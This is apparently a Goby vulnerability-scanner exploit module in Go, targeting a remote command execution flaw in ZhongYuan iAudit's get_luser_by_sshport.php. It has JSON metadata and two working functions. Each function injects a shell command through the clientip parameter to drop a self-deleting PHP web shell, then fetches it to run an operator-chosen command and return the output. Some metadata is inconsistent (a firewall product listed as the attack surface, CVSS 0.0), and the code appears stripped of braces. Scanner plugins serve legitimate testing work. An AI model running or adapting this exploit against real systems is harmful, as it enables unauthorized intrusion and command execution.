
104 lines
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2022-11-25 02:08:58 -08:00
package exploits
import (
func init() {
expJson := `{
"Name": "ZhongYuan iAudit get_luser_by_sshport.php RCE",
"Description": "ZhongYuan iAudit get_luser_by_sshport.php ,The existence of command splicing leads to remote command execution vulnerability",
"Product": "ZhongYuan iAudit",
"Homepage": "https://www.tosec.com.cn/",
"DisclosureDate": "2021-06-01",
"Author": "PeiQi",
"GobyQuery": "body=\"admin.php?controller=admin_index&action=chklogin&ref\"",
"Level": "3",
"Impact": "<p>The existence of command splicing leads to remote command execution vulnerability<br></p>",
"Recommendation": "",
"References": [
"HasExp": true,
"ExpParams": [
"name": "Cmd",
"type": "input",
"value": "id"
"ScanSteps": [
"ExploitSteps": null,
"Tags": [
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": [
"WangKang Next generation firewall"
"Support": null,
"Service": null,
"System": null,
"Hardware": null
"Recommandation": "<p>Upgrade version<br></p>"
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
randomStr := goutils.RandomHexString(8) + ".php"
uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22id%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1"
cfg_1 := httpclient.NewGetRequestConfig(uri_1)
cfg_1.VerifyTls = false
cfg_1.FollowRedirect = false
cfg_1.Header.Store("Content-type", "application/json")
if resp, err := httpclient.DoHttpRequest(u, cfg_1); err == nil {
if resp.StatusCode == 200 {
uri_2 := "/" + randomStr
cfg_2 := httpclient.NewGetRequestConfig(uri_2)
cfg_2.VerifyTls = false
cfg_2.FollowRedirect = false
cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded")
if resp, err := httpclient.DoHttpRequest(u, cfg_2); err == nil {
return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "uid")
return false
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
randomStr := goutils.RandomHexString(8) + ".php"
cmd := ss.Params["Cmd"].(string)
uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22" + cmd + "%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1"
cfg_1 := httpclient.NewGetRequestConfig(uri_1)
cfg_1.VerifyTls = false
cfg_1.FollowRedirect = false
cfg_1.Header.Store("Content-type", "application/json")
if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_1); err == nil {
if resp.StatusCode == 200 {
uri_2 := "/" + randomStr
cfg_2 := httpclient.NewGetRequestConfig(uri_2)
cfg_2.VerifyTls = false
cfg_2.FollowRedirect = false
cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded")
if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_2); err == nil {
expResult.Output = resp.Utf8Html
expResult.Success = true
return expResult